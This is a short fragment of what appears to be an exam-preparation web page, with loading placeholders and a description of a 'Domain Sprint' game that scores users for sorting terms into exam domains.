Loading fill-in-the-blank… ensure JavaScript is enabled.

Domain Sprint — Categorise the Term

A term appears — click the correct exam domain it belongs to. Correct selections score 100 pts; wrong selections deduct 25 pts. Master domain knowledge before exam day.

Loading domain sprint… ensure JavaScript is enabled.